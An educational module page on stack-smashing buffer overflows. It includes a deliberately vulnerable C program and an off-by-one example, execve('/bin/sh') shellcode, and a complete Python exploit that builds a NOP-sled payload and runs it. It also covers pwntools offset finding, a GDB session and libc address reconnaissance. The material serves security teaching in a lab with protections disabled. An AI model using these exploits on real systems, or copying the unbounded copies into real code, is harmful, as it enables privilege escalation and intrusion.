Buffer Overflow Attacks - Learning Module

Stack Smashing

Smashing the Stack for Fun and Profit

In 1996, Elias Levy (known as Aleph One) published "Smashing the Stack for Fun and Profit" in Phrack Magazine—an underground hacker publication. This seminal article didn't invent stack smashing attacks, but it codified them so clearly that it became the canonical reference for a generation of security researchers and attackers alike.

The title was apt. Stack smashing wasn't just powerful—it was elegant. A carefully crafted string of bytes, sent to a vulnerable program, could rewrite the very fabric of its execution flow. The program's own stack, its trusted workspace for function calls, became the weapon used against it.

On this page, we dissect the mechanics of stack smashing: exactly how an overflow becomes an exploit, byte by byte and address by address.

What You Will Learn

By the end of this page, you will understand: the exact structure of exploit payloads, how return addresses are located and overwritten, the role of NOP sleds and shellcode placement, handling practical challenges like null bytes and alignment, and how to calculate offsets for reliable exploitation.

The Classic Stack Smashing Scenario

Let's establish the canonical vulnerable program and trace exactly how an attacker exploits it. We'll use a slightly expanded version of our earlier example:

vulnerable.c
C
#include <stdio.h>
#include <string.h>
 
// Simulates reading input from network/file/user
void process_request(char *request) {
    char buffer[128];           // 128 bytes allocated
    int request_type = 0;       // Local variable after buffer
    
    // VULNERABLE: No bounds checking on copy
    strcpy(buffer, request);    // Copy until null terminator
    
    if (request_type == 1) {
        printf("Processing admin request...\n");
    } else {
        printf("Received: %s\n", buffer);
    }
}
 
int main(int argc, char *argv[]) {
    if (argc < 2) {
        printf("Usage: %s <request>\n", argv[0]);
        return 1;
    }
    
    printf("Server processing request...\n");
    process_request(argv[1]);
    printf("Request complete.\n");
    
    return 0;
}

The Stack Layout When process_request Executes

When main calls process_request(argv[1]), the stack is arranged as follows (x86-64 architecture, simplified):

Stack Layout During process_request Execution (Growing Downward)
Stack Address	Content	Size	Purpose
RSP+0x00	buffer[0..7]	8 bytes	Start of vulnerable buffer
RSP+0x08	buffer[8..15]	8 bytes	...
...	...	...	...
RSP+0x78	buffer[120..127]	8 bytes	End of 128-byte buffer
RSP+0x80	request_type	4 bytes	Local variable (int)
RSP+0x84	Padding	4 bytes	Alignment padding
RSP+0x88	Saved RBP	8 bytes	Caller's frame pointer
RSP+0x90	Return Address	8 bytes	⚠️ Address in main() to return to
RSP+0x98	main's stack frame...	...	Caller's context

The Attack Path

If we provide input longer than 128 bytes:

Bytes 0-127: Fill buffer (as intended)
Bytes 128-131: Overwrite request_type
Bytes 132-135: Overwrite alignment padding
Bytes 136-143: Overwrite saved RBP (frame pointer)
Bytes 144+: Overwrite the return address

When process_request executes its epilogue (leave; ret), the CPU:

Executes leave: copies the still-valid RBP into RSP, then pops the overwritten saved value into RBP (corrupting the caller's frame pointer)
Executes ret: pops the overwritten return address into RIP
Jumps to whatever address we placed there

We now control where the program executes next.
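
The byte ranges above follow from summing the sizes of everything that sits between the start of the buffer and the return address. A minimal sketch of that arithmetic, assuming the simplified layout in the table (FRAME_LAYOUT and field_offsets are illustrative names, not part of any tool, and a real binary's layout has to be confirmed in a debugger):

```python
# Illustrative only: sizes come from the simplified layout table above.
# A real compiler may reorder or pad these fields differently.
FRAME_LAYOUT = [
    ("buffer", 128),
    ("request_type", 4),
    ("padding", 4),
    ("saved_rbp", 8),
    ("return_address", 8),
]


def field_offsets(layout):
    """Map each field name to (first_byte, last_byte) relative to buffer[0]."""
    offsets = {}
    position = 0
    for name, size in layout:
        offsets[name] = (position, position + size - 1)
        position += size
    return offsets


if __name__ == "__main__":
    for name, (first, last) in field_offsets(FRAME_LAYOUT).items():
        print(f"{name:15s} bytes {first:3d}-{last:3d}  (0x{first:02x})")
```

Under these assumed sizes the return address occupies bytes 144 through 151, which matches the 0x90 row of the table.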

Offset Calculation is Critical

The exact offset from buffer start to return address depends on: buffer size, local variable sizes, compiler padding/alignment decisions, calling convention, and architecture (32-bit vs 64-bit). These values must be determined empirically through debugging or pattern analysis—they're not purely predictable from source code.

Anatomy of an Exploit Payload

A stack smashing exploit payload is more than just "a lot of data followed by an address." Professional exploit development requires understanding each component's purpose and the constraints that shape payload construction.

Component 1: NOP Sled (Landing Zone)

The NOP (No OPeration) sled consists of many NOP instructions (opcodes like \x90 on x86). Its purpose is to increase the target area for the redirected execution.

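Why is this necessary? Small variations in memory layout (environment variables, the program's path, running inside or outside a debugger) shift the stack by tens or hundreds of bytes, so we often can't predict the exact address of our shellcode. If we aim for the middle of a NOP sled instead of the shellcode start, we have a much larger margin of error: execution slides through the NOPs until it reaches the shellcode. A sled that fits in a small buffer does not by itself defeat full ASLR on 64-bit systems, where the stack base moves by far more than the sled's length.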
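
The margin a sled buys can be stated as simple arithmetic. The sketch below assumes the sled starts at the first byte of the buffer; landing_window and tolerated_shift are hypothetical helper names used only for illustration.

```python
def landing_window(buffer_addr, sled_len):
    """Return (lowest, highest) addresses that fall inside the sled."""
    return buffer_addr, buffer_addr + sled_len - 1


def tolerated_shift(buffer_addr, sled_len, aimed_addr):
    """Return (max_shift_down, max_shift_up) in bytes.

    This is how far the real buffer may sit below or above the assumed
    address while aimed_addr still lands somewhere inside the sled.
    """
    low, high = landing_window(buffer_addr, sled_len)
    if not low <= aimed_addr <= high:
        raise ValueError("aimed address is outside the sled")
    # Buffer lower by d: sled covers [low - d, high - d], so d <= high - aimed.
    # Buffer higher by d: sled covers [low + d, high + d], so d <= aimed - low.
    return high - aimed_addr, aimed_addr - low


if __name__ == "__main__":
    base = 0x7fffffffdcc0          # example address, must be measured per target
    down, up = tolerated_shift(base, 100, base + 50)
    print(f"tolerates {down} bytes down, {up} bytes up")
```

Aiming at the middle of the sled balances the two margins, which is why the midpoint is the usual choice. The margins are measured in bytes, so they cover small layout differences rather than full address randomization.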

Component 2: Shellcode (Payload)

Shellcode is the actual malicious machine code. Common shellcode types:

Spawn a shell: Execute /bin/sh (local privilege escalation)
Reverse shell: Connect back to attacker's machine
Bind shell: Listen on a port for attacker's connection
Download and execute: Fetch second-stage payload

Component 3: Padding

Filler bytes to reach the exact offset of the return address. Recognizable patterns such as AAAA... are common during development and are often replaced with NOP bytes or junk in the final exploit.

Component 4: Return Address

The address that overwrites the saved return address on the stack. This must point back into our NOP sled or directly to our shellcode. Getting this right is the crux of reliable exploitation.

exploit_structure.py
Python
#!/usr/bin/env python3
"""
Classic stack smashing exploit structure
Target: vulnerable.c compiled without protections
Architecture: x86-64 Linux
"""
 
# Configuration
buffer_size = 128
local_vars_size = 8           # request_type + padding
saved_rbp_size = 8
offset_to_ret = buffer_size + local_vars_size + saved_rbp_size  # 144 bytes
 
# Component 1: NOP sled (landing zone)
NOP = b"\x90"
nop_sled = NOP * 64           # 64 NOPs for landing area
 
# Component 2: Shellcode - execve("/bin/sh", NULL, NULL)
# This is 24-byte x86-64 Linux shellcode (example)
shellcode = (
    b"\x48\x31\xf6"              # xor rsi, rsi
    b"\x48\xbf\x2f\x62\x69\x6e"  # movabs rdi, '/bin//sh'
    b"\x2f\x2f\x73\x68"
    b"\x57"                      # push rdi
    b"\x48\x89\xe7"              # mov rdi, rsp
    b"\x48\x31\xd2"              # xor rdx, rdx
    b"\xb0\x3b"                  # mov al, 59 (execve syscall)
    b"\x0f\x05"                  # syscall
)
 
# Component 3: Padding to reach return address
current_length = len(nop_sled) + len(shellcode)
padding_needed = offset_to_ret - current_length
padding = b"A" * padding_needed
 
# Component 4: Return address (pointing into NOP sled)
# This address must be determined empirically!
# Example: stack address during debugging
return_addr = 0x7fffffffdea0  # MUST be adjusted per target
ret_addr_bytes = return_addr.to_bytes(8, 'little')
 
# Construct final payload
payload = nop_sled + shellcode + padding + ret_addr_bytes
 
print(f"Payload size: {len(payload)} bytes")
print(f"NOP sled: {len(nop_sled)} bytes")
print(f"Shellcode: {len(shellcode)} bytes")
print(f"Padding: {len(padding)} bytes")
print(f"Return address: {hex(return_addr)}")
 
# Write payload to file or use directly
with open("payload.bin", "wb") as f:
    f.write(payload)

Shellcode Constraints

Shellcode must avoid bytes that would terminate the copy (null bytes for strcpy, newlines for gets), be position-independent (no hardcoded absolute addresses), fit within the available buffer space, and work on the target architecture/OS. Writing reliable shellcode is an art in itself.

Finding the Return Address Offset

Determining the exact offset from the buffer start to the return address is crucial. Too short, and we don't overwrite it; too long, and we corrupt memory beyond, potentially crashing before we gain control. Several techniques are used:

Offset Discovery Techniques

•Manual Calculation: Calculate from buffer size + local variables + saved registers. Requires understanding compiler behavior and calling conventions. Error-prone due to alignment and optimization differences.
•Pattern Generation: Create a unique non-repeating pattern (e.g., Aa0Aa1Aa2...). Feed it to the program, and when it crashes, the bytes that overwrote the return address form a unique substring. On x86-64 the ret usually faults on the non-canonical address before RIP changes, so read those bytes from the top of the stack (RSP) rather than from RIP. Look up that substring to find the exact offset.
•Binary Search: Start with a large input and observe the crash address. Refine the payload length using binary search until the crash address precisely matches your controlled bytes.
•Debugger Analysis: Attach GDB, set a breakpoint after the vulnerable copy, examine the stack layout directly. Most accurate but requires local access and debugging ability.
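
The pattern technique can be sketched without any external tooling. The code below is a minimal illustration of the Aa0Aa1Aa2... scheme named above; make_pattern and find_offset are assumed names for this example and not the API of any particular framework.

```python
import string


def make_pattern(length):
    """Build an 'Aa0Aa1Aa2...' pattern in which every 3-byte group is unique."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length].encode("ascii")
    raise ValueError("pattern longer than 20280 bytes would repeat")


def find_offset(pattern, crash_bytes):
    """Return the offset of crash_bytes inside pattern, or -1 if absent."""
    return pattern.find(crash_bytes)


if __name__ == "__main__":
    pattern = make_pattern(200)
    # Stand-in for the 8 bytes a debugger would show at the return address slot.
    observed = pattern[144:152]
    print(find_offset(pattern, observed))
```

If the debugger shows the overwritten slot as an integer rather than raw bytes, convert it first with value.to_bytes(8, "little") so the byte order matches memory.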

find_offset.py
Python
#!/usr/bin/env python3
"""
Pattern-based offset discovery using pwntools
"""
 
from pwn import *
 
# Generate a cyclic pattern of 200 bytes
pattern = cyclic(200)    # Creates b'aaaabaaacaaadaaaeaaa...'
print(f"Pattern: {pattern[:50]}...")
 
# After the crash, suppose the low 4 bytes of the overwritten return
# address are 0x6161616a ('jaaa' in little-endian)
# Find the offset:
crash_value = 0x6161616a  
offset = cyclic_find(crash_value)
print(f"Offset to return address: {offset} bytes")
 
# Alternative: Find from substring
# If crash shows RIP contains 'jaaa':
offset_str = cyclic_find(b'jaaa')
print(f"Offset (from string): {offset_str}")
 
# Example using pwntools for complete exploit development
context.arch = 'amd64'
context.os = 'linux'
 
# Create exploit payload once offset is known
def create_exploit(offset, target_addr):
    payload = b"A" * offset           # Fill to return address
    payload += p64(target_addr)       # Overwrite with target
    return payload
 
# Generate pattern file for manual testing
with open("pattern.txt", "wb") as f:
    f.write(pattern)
    
print("\n[*] Feed pattern.txt to vulnerable program")
print("[*] On crash, check register values or core dump")
print("[*] Use cyclic_find(crash_value) to get offset")

Practical Demonstration with GDB

Here's how to find the offset using a debugger:

gdb_offset_finding.txt
GDB Session
$ gdb -q ./vulnerable
(gdb) set disable-randomization on   # Disable ASLR for testing
(gdb) break process_request
(gdb) run AAAAAAAAAAAAtest
 
# At breakpoint, examine stack layout:
(gdb) info frame
Stack level 0, frame at 0x7fffffffe000:
 rip = 0x401196 in process_request; saved rip = 0x401223
 called by frame at 0x7fffffffe020
 
(gdb) x/20gx $rsp
0x7fffffffdf68: 0x0000000000000000  0x0000000000000000  <- buffer starts
0x7fffffffdf78: 0x0000000000000000  0x0000000000000000
...
0x7fffffffdfe8: 0x0000000000000000  <- request_type + padding (buffer ended at 0x7fffffffdfe7)
0x7fffffffdff0: 0x00007fffffffe010  <- saved RBP
0x7fffffffdff8: 0x0000000000401223  <- return address (144 bytes from start)
 
# Calculate: buffer at 0x7fffffffdf68, ret addr at 0x7fffffffdff8
# Offset = 0x7fffffffdff8 - 0x7fffffffdf68 = 0x90 = 144 bytes
# (Note: Actual offset may vary based on compilation)
 
(gdb) x/gx $rbp+8
0x7fffffffdff8: 0x0000000000401223   # Confirms return address location
 
# Now we know: 144 bytes to reach return address
 

Compiler Variations

Different compilers, optimization levels, and even compiler versions can produce different stack layouts. An exploit developed on GCC 9 might fail on GCC 11 due to different alignment decisions. Always test exploits against the exact target binary.

The Null Byte Problem

One of the most significant constraints in exploit development is handling null bytes (\x00). String functions like strcpy, strcat, and sprintf treat a null byte as the end of the string. If your payload contains a null byte, the copy stops there, and the rest of your payload never reaches its destination. (gets is different: it copies null bytes and stops at a newline instead.)

Null Byte Sources

•Addresses with zero bytes: 0x00401234 contains null
•Small integers in addresses: High bytes often zero on 64-bit
•Shellcode MOV instructions: mov eax, 0 contains nulls
•String terminators: Embedded strings need terminators

Null Byte Avoidance

•Address selection: Find addresses without null bytes
•Instruction substitution: xor eax, eax instead of mov eax, 0
•Self-modifying code: Decode payload at runtime
•Polymorphic shellcode: Encode payload, prepend decoder
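
A quick way to see the constraint is to model what a string copy does with a byte sequence. The sketch below is illustrative only: copied_by_strcpy and find_bad_bytes are assumed helper names, and the two byte strings are the standard encodings of mov eax, 59 and push 59; pop rax.

```python
def copied_by_strcpy(payload):
    """Return the bytes strcpy would copy: everything before the first NUL."""
    end = payload.find(b"\x00")
    return payload if end == -1 else payload[:end]


def find_bad_bytes(payload, bad=b"\x00"):
    """List (offset, byte) pairs for every payload byte that appears in bad."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]


if __name__ == "__main__":
    mov_eax_59 = bytes.fromhex("b83b000000")   # mov eax, 59
    push_pop_59 = bytes.fromhex("6a3b58")      # push 59; pop rax
    print(find_bad_bytes(mov_eax_59))          # three nulls in the immediate
    print(find_bad_bytes(push_pop_59))         # no nulls
    print(copied_by_strcpy(mov_eax_59).hex())  # copy stops after two bytes
```

Passing bad=b"\x00\n" extends the same check to inputs read line by line, where a newline also ends the copy.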

null_free_techniques.asm

Assembly

; PROBLEM: This shellcode contains null bytes
; mov eax, 0x0000003b    ; 3b 00 00 00 - THREE null bytes!
; mov rdi, 0             ; Contains nulls
 
; SOLUTION: Null-free equivalents
 
; Instead of: mov eax, 0
xor eax, eax             ; Zero register without null bytes
 
; Instead of: mov rax, 0
xor rax, rax
 
; Instead of: mov eax, 59 (execve = 59 = 0x3b)
push 59
pop rax                  ; Avoid null bytes in immediate
 
; Instead of: mov rdi, address_with_nulls
; Use stack to build strings:
xor rdi, rdi
push rdi                 ; Push null terminator
mov rdi, 0x68732f2f6e69622f  ; '/bin//sh' (8 bytes, no nulls)
push rdi
mov rdi, rsp            ; Point RDI to our string
 
; Instead of: mov rsi, 0
xor rsi, rsi            ; NULL for argv
 
; Instead of: mov rdx, 0  
xor rdx, rdx            ; NULL for envp
 
; Full null-free execve shellcode for x86-64:
; xor rsi, rsi           ; argv = NULL
; push rsi               ; null terminator for string
; mov rdi, 0x68732f2f6e69622f  ; '/bin//sh'
; push rdi
; mov rdi, rsp           ; pointer to '/bin//sh'
; xor rdx, rdx           ; envp = NULL
; push 59
; pop rax                ; syscall number for execve
; syscall

The 64-bit Address Challenge

On 64-bit systems, virtual addresses for user space are typically in the range of 0x00007fffffffffff and below. This means the upper two bytes of every user-space address are null!

For example, a stack address like 0x00007fffffffdea0 contains TWO null bytes at the front.

Solutions for 64-bit:

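Rely on implicit null bytes: The saved return address being overwritten already has zeros in its upper two bytes, and strcpy appends one terminating null of its own, so the payload only has to supply the low six bytes. This only works when the address is the last thing in the payload, because the copy stops at that point.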
Use addresses in lower regions: In some scenarios, you can find usable addresses without leading nulls.
Pivoting techniques: Use return-oriented programming (covered later) to avoid needing clean addresses in your initial payload.
Exploit different vulnerability types: read() and memcpy() don't treat null bytes specially, so exploits using these are not constrained.

The Little-Endian Advantage

On little-endian systems (x86, x86-64), multi-byte values are stored with the least significant byte first. For the address 0x00007fffffffdea0, the bytes in memory are: a0 de ff ff ff 7f 00 00. The null bytes come LAST. If we're overwriting just enough to reach the return address and leverage implicit nulls, we only need to write the first 6 non-null bytes.
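
The byte order is easy to check with Python's struct module. This is a small sketch using the example address from the text; le_bytes and strip_implicit_nulls are illustrative names.

```python
import struct


def le_bytes(address):
    """Pack a 64-bit address the way x86-64 stores it in memory."""
    return struct.pack("<Q", address)


def strip_implicit_nulls(address):
    """Drop trailing (most significant) zero bytes from the packed address."""
    trimmed = le_bytes(address).rstrip(b"\x00")
    if b"\x00" in trimmed:
        # A zero in the middle cannot be left implicit.
        raise ValueError("address contains an interior null byte")
    return trimmed


if __name__ == "__main__":
    addr = 0x00007fffffffdea0
    print(le_bytes(addr).hex())              # a0deffffff7f0000
    print(strip_implicit_nulls(addr).hex())  # a0deffffff7f
```

Only trailing zeros can be omitted this way. An address such as 0x00007fff00ffdea0 has a zero in the middle of its packed form, so the helper rejects it.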

Address Space and Targeting

Once we control the return address, we need to redirect it somewhere useful. The target depends on what we want to execute and what addresses are available.

Classic Targeting Strategies

•Target 1: Return to Buffer — Point the return address back into the buffer we control, where we've placed shellcode. Classic approach. Defeated by DEP/NX (non-executable stack).
•Target 2: Return to Known Code Location — Jump to existing code in the binary or libraries. 'Return-to-libc' jumps to system() with /bin/sh as argument. Doesn't require executable stack.
•Target 3: Return to Heap — If we control heap data, return there. Sometimes heap is executable when stack isn't (rare now).
•Target 4: Return-Oriented Programming (ROP) — Chain small code sequences ('gadgets') ending in RET. Turing-complete computation without injecting new code. Defeats DEP entirely.

Finding Usable Addresses

In the absence of ASLR (or if ASLR is bypassed/weak), addresses are predictable:

Address Sources for Exploitation
Source	Typical Address Range	ASLR Status	Use Case
Main binary (.text)	0x400000 - 0x4fffff	Often not randomized (PIE off)	ROP gadgets, direct function calls
Stack	0x7fff00000000+	Randomized by default	Shellcode (if executable)
Heap	Varies	Partially randomized	Heap spray, object corruption
libc	Varies	Randomized (high entropy)	return-to-libc, ROP gadgets
Shared libraries	Varies	Randomized	Additional gadgets, functions

address_reconnaissance.sh
Bash
#!/bin/bash
# Reconnaissance: Finding useful addresses
 
# Check if PIE (Position Independent Executable) is enabled
checksec --file=./vulnerable
# Output: PIE: No means main binary addresses are fixed
 
# Find libc base address (ASLR disabled or using info leak)
ldd ./vulnerable
# libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ffff7c00000)
 
# Find 'system' function address in libc
readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep "system"
# system@@GLIBC_2.2.5 at offset 0x50d70
 
# Find '/bin/sh' string in libc
strings -a -t x /lib/x86_64-linux-gnu/libc.so.6 | grep "/bin/sh"
# 0x1d8678 /bin/sh
 
# Calculate absolute addresses (libc_base + offset):
# system: 0x00007ffff7c00000 + 0x50d70 = 0x7ffff7c50d70
# "/bin/sh": 0x00007ffff7c00000 + 0x1d8678 = 0x7ffff7dd8678
 
# Find useful ROP gadgets in binary
ROPgadget --binary ./vulnerable | head -20
 
# Check memory layout of running process
cat /proc/$(pgrep vulnerable)/maps
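
The base-plus-offset step in the comments above is plain addition. A minimal sketch using the example values from the script output (they are specific to that one libc build and load address, so treat them as placeholders; resolve is an illustrative name):

```python
# Example values copied from the comments above; they differ per system.
LIBC_BASE = 0x00007ffff7c00000
OFFSETS = {
    "system": 0x50d70,
    "/bin/sh": 0x1d8678,
}


def resolve(base, offsets):
    """Turn file offsets into absolute addresses for a given load base."""
    return {name: base + offset for name, offset in offsets.items()}


if __name__ == "__main__":
    for name, address in resolve(LIBC_BASE, OFFSETS).items():
        print(f"{name:8s} {address:#x}")
```

Keeping offsets and base separate makes it clear which part ASLR changes: the offsets are fixed for a given library file, while the base moves on every run.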

ASLR Complicates Targeting

With ASLR enabled, library and stack addresses change each run. Exploits must either: (1) Leak an address first to calculate targets, (2) Use fixed addresses from non-PIE binaries, (3) Brute-force a small entropy space (32-bit has only ~12-16 bits of entropy), or (4) Use format string or other bugs to read memory before exploiting.
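
The cost of option (3) can be estimated with basic probability. The sketch below assumes every attempt faces a fresh, uniformly random layout, which is a simplification (a forking server that keeps its layout behaves differently); the function names are illustrative.

```python
def success_probability(entropy_bits, attempts):
    """Chance that at least one of `attempts` independent guesses is right."""
    p_single = 1.0 / (2 ** entropy_bits)
    return 1.0 - (1.0 - p_single) ** attempts


def expected_attempts(entropy_bits):
    """Mean number of independent guesses until the first hit."""
    return 2 ** entropy_bits


if __name__ == "__main__":
    for bits in (12, 16, 28):
        tries = expected_attempts(bits)
        print(f"{bits} bits: about {tries} attempts on average, "
              f"{success_probability(bits, tries):.0%} chance within that many")
```

Each extra bit of entropy doubles the expected work, which is why brute force is only realistic against the small entropy of 32-bit layouts.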

Complete Exploitation Walkthrough

Let's walk through a complete stack smashing exploit development process against our vulnerable program, assuming a system without modern protections (for educational purposes).

complete_exploit.py
Python
#!/usr/bin/env python3
"""
Complete stack smashing exploit for vulnerable.c
Environment: x86-64 Linux, ASLR disabled, DEP disabled, no stack canaries
Compile target: gcc -fno-stack-protector -z execstack -no-pie -o vulnerable vulnerable.c
"""
 
import struct
import subprocess
import sys
 
# =========================================
# STEP 1: Determine offset to return address
# =========================================
# From pattern analysis or debugging: 144 bytes to return address
OFFSET_TO_RET = 144
 
# =========================================
# STEP 2: Develop null-free shellcode
# =========================================
# x86-64 Linux execve("/bin/sh") shellcode (24 bytes, no null bytes)
shellcode = bytes([
    0x48, 0x31, 0xf6,                        # xor rsi, rsi
    0x48, 0xbf, 0x2f, 0x62, 0x69, 0x6e,      # movabs rdi, '/bin//sh'
    0x2f, 0x2f, 0x73, 0x68,
    0x57,                                     # push rdi
    0x48, 0x89, 0xe7,                        # mov rdi, rsp
    0x48, 0x31, 0xd2,                        # xor rdx, rdx
    0xb0, 0x3b,                              # mov al, 59
    0x0f, 0x05                               # syscall
])
 
# =========================================
# STEP 3: Find target address
# =========================================
# With GDB, we found buffer starts at approximately 0x7fffffffdcc0
# We'll aim for middle of NOP sled for reliability
NOP_SLED_SIZE = 100
TARGET_ADDR = 0x7fffffffdcc0 + (NOP_SLED_SIZE // 2)
 
# =========================================
# STEP 4: Construct the payload
# =========================================
def build_payload():
    payload = b""
    
    # NOP sled - landing zone (100 bytes)
    payload += b"\x90" * NOP_SLED_SIZE
    
    # Shellcode (24 bytes)
    payload += shellcode
    
    # Current payload size
    current_size = len(payload)  # 124 bytes
    
    # Padding to reach return address (20 bytes to reach 144)
    padding_needed = OFFSET_TO_RET - current_size
    payload += b"A" * padding_needed
    
    # Return address (little-endian). The upper 2 bytes are null, and a
    # command-line argument cannot contain null bytes, so send only the low
    # 6 bytes; the saved return address already has zeros in its top 2 bytes.
    payload += struct.pack("<Q", TARGET_ADDR)[:6]
    
    return payload
 
# =========================================
# STEP 5: Execute the exploit
# =========================================
def main():
    payload = build_payload()
    
    print(f"[*] Payload size: {len(payload)} bytes")
    print(f"[*] NOP sled: {NOP_SLED_SIZE} bytes")  
    print(f"[*] Shellcode: {len(shellcode)} bytes")
    print(f"[*] Target address: {hex(TARGET_ADDR)}")
    print(f"[*] Offset to return: {OFFSET_TO_RET}")
    
    # Verify no nulls in critical portion
    critical_portion = payload[:OFFSET_TO_RET]
    if b'\x00' in critical_portion:
        print("[!] Warning: Null byte in payload before return address!")
        null_pos = critical_portion.find(b'\x00')
        print(f"[!] Null at offset: {null_pos}")
    
    # Write payload for manual testing
    with open("payload.bin", "wb") as f:
        f.write(payload)
    print("[*] Payload written to payload.bin")
    
    # Execute (WARNING: Only in controlled environment!)
    print("[*] Launching exploit...")
    try:
        # Run vulnerable program with our payload
        result = subprocess.run(
            ["./vulnerable", payload],
            timeout=5
        )
    except Exception as e:
        print(f"[*] Execution resulted in: {e}")
        print("[*] If you see a shell prompt, the exploit succeeded!")
 
if __name__ == "__main__":
    main()
    print("\n[*] If successful, you should have a shell.")
    print("[*] Type 'id' or 'whoami' to verify.")

Execution Flow After Successful Exploit

main() calls process_request(payload)
strcpy copies the payload into buffer, writing past its 128 bytes and over the saved return address at offset 144
Return address now points to our NOP sled (0x7fffffffdcc0+)
Function epilogue executes: leave; ret
CPU pops our address into RIP, jumps to NOP sled
Execution slides through NOPs, reaches shellcode
Shellcode executes execve("/bin/sh", NULL, NULL)
Shell spawned with the process's privileges

If the process ran as root (e.g., a setuid binary or privileged daemon), we now have a root shell.

The Power of Stack Control

This relatively simple technique—overwriting a return address—transforms a memory corruption bug into arbitrary code execution. The combination of predictable memory layout, lack of bounds checking, and executable stacks made this attack devastatingly effective for decades.

Off-by-One Exploitation

One of the most fascinating aspects of stack smashing is that even a single-byte overflow can be enough for exploitation. Off-by-one errors—where a loop writes exactly one byte past the buffer—are common and surprisingly exploitable.

off_by_one.c
C
// Classic off-by-one vulnerability
#include <stddef.h>

char *get_user_input(void);  // Assumed helper: returns a string of 64+ bytes

void copy_string(char *dest, const char *src, size_t size) {
    size_t i;
    
    // Bug: Loop condition uses <= instead of <
    // Allows writing one byte past buffer end
    for (i = 0; i <= size; i++) {  // WRONG: should be i < size
        dest[i] = src[i];
        if (src[i] == '\0') 
            break;
    }
}
 
void vulnerable() {
    char buffer[64];
    char *input = get_user_input();
    
    copy_string(buffer, input, 64);
    // If input is 64 bytes or longer, the loop also writes buffer[64] = input[64]
    // (an attacker-chosen byte, or '\0' when input is exactly 64 bytes).
    // If buffer sits directly below the saved RBP, this overwrites its lowest byte!
}

How One Byte Becomes Code Execution

The off-by-one overwrites the least significant byte of the saved frame pointer (RBP). This might seem useless, but consider:

When vulnerable() returns, it executes leave; ret:
- mov rsp, rbp: RSP gets vulnerable()'s own RBP, which is still intact
- pop rbp: RBP is loaded with the corrupted saved value
- ret: control returns normally to the caller, whose RBP is now wrong
The caller later executes its own leave; ret:
- Its leave copies the corrupted RBP into RSP
- Its ret pops a return address from a memory location we influenced
If we carefully control the value written to that byte, we can point the frame into our buffer, where we've placed a controlled return address.

This is called a "Frame Pointer Overwrite" or "Off-by-One Stack Pivot".

The attack requires:

Knowing or guessing the stack layout
A corrupted LSB that moves the caller's frame into attacker-controlled data
A gadget address or shellcode pointer placed in that data

This demonstrates that security margins matter: even one byte of overflow, in the right place, compromises the system.
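
The effect of the stray byte can be modeled without touching real memory. The sketch below mirrors the loop bound of copy_string in Python and assumes the 64-byte buffer sits directly below an 8-byte saved RBP; the frame values are made-up examples and simulate is an illustrative name.

```python
BUF_SIZE = 64


def buggy_copy(memory, dest, src, size):
    """Python model of copy_string: the <= bound writes up to size + 1 bytes."""
    i = 0
    while i <= size:              # same bug as the C loop
        memory[dest + i] = src[i]
        if src[i] == 0:
            break
        i += 1


def simulate(saved_rbp, user_input):
    """Return the saved RBP value after copying user_input into the buffer."""
    # Model: 64-byte buffer immediately followed by the saved RBP (little-endian).
    memory = bytearray(BUF_SIZE) + bytearray(saved_rbp.to_bytes(8, "little"))
    buggy_copy(memory, 0, user_input + b"\x00", BUF_SIZE)
    return int.from_bytes(memory[BUF_SIZE:], "little")


if __name__ == "__main__":
    original = 0x7fffffffe010
    print(hex(simulate(original, b"hi")))                  # unchanged
    print(hex(simulate(original, b"A" * 64)))              # low byte becomes 0x00
    print(hex(simulate(original, b"A" * 64 + b"\x40")))    # low byte becomes 0x40
```

Only the lowest byte changes, so the frame pointer can move by at most 255 bytes. That is enough when the buffer lies within that distance of the original frame.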

Real-World Impact

Off-by-one bugs are among the most commonly found vulnerabilities in code audits. They're easy to introduce (fence-post errors are a classic programming mistake) and often dismissed as 'just one byte.' But as we've seen, one byte can be enough. Always audit loop bounds and buffer size calculations with extreme care.

Summary: Mastering Stack Smashing Mechanics

We've dissected the mechanics of stack smashing—the foundational exploitation technique for buffer overflows. Let's consolidate the key insights.

Key Takeaways

•Stack smashing overwrites the saved return address — Giving attackers control of the instruction pointer (RIP/EIP) when the function returns.
•Exploit payloads have a structured format — NOP sled, shellcode, padding, and return address each serve specific purposes in reliable exploitation.
•Offset determination is critical — Finding the exact byte distance from buffer to return address requires pattern analysis, debugging, or trial and error.
•Null bytes constrain payloads — String functions terminate at nulls, requiring null-free shellcode and careful address selection.
•64-bit addresses contain nulls — But little-endian byte ordering and implicit nulls enable exploitation despite this constraint.
•Even one-byte overflows are exploitable — Off-by-one errors enable frame pointer overwrites that redirect control flow.

What's Next: Code Injection

The next page explores code injection in depth—the development of shellcode, techniques for encoding payloads to bypass filters, and the art of writing position-independent malicious code. We'll examine how attackers craft the payload that executes once they've redirected control flow.

Page Complete

You now understand the precise mechanics of stack smashing attacks: how return addresses are located and overwritten, how exploit payloads are structured, and the practical challenges of reliable exploitation. This foundation is essential for understanding both advanced exploitation techniques and the defenses designed to stop them.